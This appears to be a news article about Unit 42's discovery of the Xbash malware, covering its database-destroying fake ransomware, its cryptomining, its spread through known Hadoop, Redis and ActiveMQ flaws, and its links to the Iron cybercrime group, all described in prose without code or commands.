Researchers have discovered a new sophisticated malware family in the wild, which wrecks havoc on Windows and Linux systems with a combination of data destructive ransomware and malicious cryptomining.

The malware, dubbed by Palo Alto Networks’ Unit 42 researchers who discovered it as Xbash, has been targeting weak passwords and unpatched vulnerabilities to infect systems. Xbash also shares striking similarities to worms like WannaCry and Petya/NotPetya, such as self-propagation capabilities and its ability to rapidly spread.

“Xbash aimed on discovering unprotected services, deleting victim’s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins,” the researchers said in a Monday post. “Xbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows system.”

Xbash has an array of features that make it stand out. It specifically targets Windows and Linux, it’s developed in Python, it fetches IP addresses and domain names from its C2 servers for exploiting, and it has intranet scanning functionality.

Researchers discovered four different versions of Xbash so far. All have an array of sophisticated capabilities, including quick development (using Python), easy installation, anti-detection features and cross-platform capabilities. Despite this high level of sophistication, researchers said that code and timestamp differences among the four versions show that the malware is still under active development.

The botnet began to operate since as early as May 2018, and so far, researchers said they observed 48 incoming transactions to the Bitcoin wallet addresses (totaling $6,000 total) used by the malware – possibly indicating 48 victims of its ransom behavior.

Attack Vector

The malware focuses on three known vulnerabilities: A Hadoop YARN ResourceManager unauthenticated command execution flaw (discovered in 2016 with no CVE), a Redis arbitrary file write and remote command execution glitch (found in 2015 with no CVE), and ActiveMQ arbitrary file write vulnerability (CVE-2016-3088).

Xbash offers two separate functions for Windows and Linux targets – the malware is capable of understanding the operating system of a targeted system and delivering a payload designed for that OS.

It appears that on Windows, Xbash will focus on malicious cryptomining functions and self-propagation techniques, while on Linux systems, the malware will flaunt its data destructive tendencies; as the malware triggers a downloader to execute a coinminer on Windows, while on Linux it flaunts ransomware functions.

On Linux, Xbash first attempts to log in to a service – generally MySQL, MongoDB, and PostgreSQL. Once successfully logged in, it will delete almost all existing databases in the server and create a new database named “PLEASE_READ_ME_XYZ.” It will then insert a ransom message into a table labeled “WARNING” in the new database

The ransomware message asks for .02 BTC, or around $125, as a payment to release the compromised databases.

On Windows, the malware will execute a JavaSCript or VBScript downloader. The downloader in turn calls on a coinminer to be executed onto the system: “Depending on Xbash’s version, this new startup item will download a malicious HTML or a Scriptlet file from Xbash’s C2 server, and to execute the JavaScript or VBScript code in the file via “mshta” or via “regsvr32″. These scripts will then invoke PowerShell to download a malicious PE executable or PE DLL file,” researchers said.

However, Unit 42 researchers said that they have no found evidence of code in Xbash that back up deleted databases at all – meaning that the malicious malware poses as ransomware, but still destructs databases after the ransom has been paid.

Analysis shows that the malware is likely linked to Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 2015.

Researchers made the connection after discovering that Xbash hard-coded a bunch of domain names as its C2 servers – some of which were reused from previous Windows coinminers attributed to Iron cybercrime group.

“After further investigation we realized it’s a combination of botnet and ransomware that developed by an active cybercrime group Iron (aka Rocke) in this year,” the researchers said.